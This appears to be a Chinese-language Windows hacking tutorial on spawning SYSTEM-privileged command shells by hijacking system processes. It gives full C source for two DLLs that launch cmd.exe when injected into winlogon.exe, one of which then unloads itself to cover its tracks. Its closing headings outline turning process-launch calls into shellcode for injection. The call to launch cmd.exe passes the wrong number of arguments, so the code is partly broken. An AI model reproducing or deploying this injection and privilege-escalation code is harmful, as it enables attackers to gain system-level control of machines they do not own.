[toc]
利用系统进程来创建新的进程
lsass.exe系统中没有加载kernel32.dll,只有ntdll.dll,需要先将kernel32.dll注入到lsass.exe进程中
1.使用CreateProcessWithTokenW获取其他进程令牌来创建新的进程
之前的文章写过: 6.使用C语言在windows中创建线程与进程并且创建具有system权限进程
C:\Windows\System32\kernel32.dll
2. 将Dll注入到系统进程中弹出cmd程序
编写x86_64位dll程序并编译
将Dll注入到拥有系统权限进程winlogn.exe的程序中,系统如果有两个winlogn.exe会有一个没效果,注入器需要有管理员与Debug权限
完整代码,功能为创建一个cmd.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
#include <Windows.h>
#include <tchar.h>
typedef BOOL(WINAPI* pCreateProcessW)(LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
int Create()
{
HMODULE hDll = LoadLibraryW(L"Kernel32.dll");
pCreateProcessW nCreateProcessW = (pCreateProcessW)GetProcAddress(hDll, "CreateProcessW");
PROCESS_INFORMATION pi;
STARTUPINFOW si;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.wShowWindow = SW_SHOW;
si.dwFlags = STARTF_USESHOWWINDOW;
nCreateProcessW(L"c://windows//system32//cmd.exe", NULL, NULL, FALSE, NULL, NULL, NULL, NULL,
&si, &pi);
FreeLibrary(hDll);
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
Create();
break;
}
case DLL_THREAD_ATTACH:
{
break;
}
case DLL_THREAD_DETACH:
{
break;
}
case DLL_PROCESS_DETACH:
{
break;
}
default:
break;
}
return TRUE;
}
|
3. 将Dll注入到系统进程中弹出cmd程序而后卸载自身
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
#include <Windows.h>
HMODULE g_hDll = NULL;
int Create();
DWORD WINAPI UnloadProc(PVOID param);
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
g_hDll = (HMODULE)hModule;
Create();
break;
}
case DLL_THREAD_ATTACH:
{
break;
}
case DLL_THREAD_DETACH:
{
break;
}
case DLL_PROCESS_DETACH:
{
break;
}
default:
break;
}
return TRUE;
}
int Create()
{
PROCESS_INFORMATION pi;
STARTUPINFOW si;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.wShowWindow = SW_SHOW;
si.dwFlags = STARTF_USESHOWWINDOW;
CreateProcessW(L"c://windows//system32//cmd.exe", NULL, NULL, FALSE, NULL, NULL, NULL, NULL,
&si, &pi);
HANDLE hThread = CreateThread(NULL, 0, UnloadProc, NULL, 0, NULL);
CloseHandle(hThread);
return 0;
}
DWORD WINAPI UnloadProc(PVOID param)
{
FreeLibraryAndExitThread(g_hDll, 0);
return 0;
}
|
4.利用shellcode将system("cmd.exe")转为机器码注入到系统进程中
5.利用shellcode将CreateProcessA()转为机器码注入到系统进程中
5. 将代码注入到winlogn.exe中
